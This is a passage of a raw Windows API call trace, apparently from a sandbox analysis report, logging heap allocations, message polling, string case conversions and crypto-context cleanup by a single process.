lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0161.021] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0161.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0161.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0161.021] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0161.021] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.021] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0161.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0161.021] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0161.021] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0161.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0161.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0161.022] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0161.022] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.022] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0161.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0161.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0161.022] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.022] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0161.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0161.022] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0161.022] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0161.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0161.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0161.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0161.023] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0161.023] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.023] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0161.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0161.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0161.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0161.023] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.023] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.024] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0161.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0161.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0161.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.028] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.028] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.028] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0161.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.031] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0161.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0161.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0161.031] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0161.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0161.032] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0161.032] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0161.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0161.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0161.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0161.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0161.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0161.032] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0161.032] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0161.032] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0161.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0161.032] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.032] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0161.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0161.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0161.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0161.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0161.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0161.033] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.033] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0161.033] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0161.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0161.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0161.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0161.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0161.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0161.033] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0161.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0161.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0161.033] CryptDestroyKey (hKey=0xaa56a0) returned 1 [0161.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0161.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0161.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0161.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0161.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0161.034] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0161.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0161.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0161.034] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0161.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0161.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0161.034] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0161.034] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0161.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0161.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0161.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0161.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0161.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0161.034] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0161.034] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0161.034] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0161.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0161.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0161.034] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0161.035] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0161.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0161.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0161.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0161.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0161.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0161.035] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0161.035] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0161.035] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0161.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0161.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0161.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0161.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0161.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0161.035] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0161.035] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0161.035] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0161.035] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0161.035] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0161.036] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0161.036] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0161.036] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0161.036] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0161.036] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0161.036] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0161.036] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.036] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0161.036] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.036] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0161.036] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.036] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.036] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0161.036] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.036] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0161.036] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.036] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.037] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.037] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.037] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0161.037] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0161.037] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0161.037] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0161.037] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0161.037] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.037] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.037] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.037] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.037] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.037] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.037] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0161.037] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.037] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0161.037] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.037] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.038] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.038] CryptReleaseContext (hProv=0xab2890, dwFlags=0x0) returned 1 [0161.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0161.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0161.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0161.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0161.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0161.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0161.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0161.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0161.038] HeapFree (in: hHeap=0x25c0000, 